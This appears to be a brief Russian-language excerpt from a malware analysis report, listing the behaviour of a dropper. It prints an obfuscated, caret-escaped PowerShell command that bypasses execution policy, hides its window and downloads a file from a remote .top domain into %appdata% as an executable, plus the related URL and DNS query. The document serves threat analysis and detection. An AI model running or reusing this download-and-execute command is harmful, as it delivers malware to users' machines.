Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwe^r^ShEL^L.EX^E^ -E^XE^CUti^o^NpOlIcY BY^Pa^Ss ^-^N^OP^R^o^fIl^e ^-W^iN^doWSt^YL^e ^h^ID^DEN (nEW-OB^jEc^t S^YsTE^m.N^Et.^W^ebc^l^IenT)^.^DoWNL^oADFi^Le('http://toagoores.top/re...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "pOwe^r^ShEL^L.EX^E^ -E^XE^CUti^o^NpOlIcY BY^Pa^Ss ^-^N^OP^R^o^fIl^e ^-W^iN^doWSt^YL^e ^h^ID^DEN (nEW-OB^jEc^t S^YsTE^m.N^Et.^W^ebc^l^IenT)^.^DoWNL^oADFi^Le('http://toagoores.top/re...' (со скрытым окном)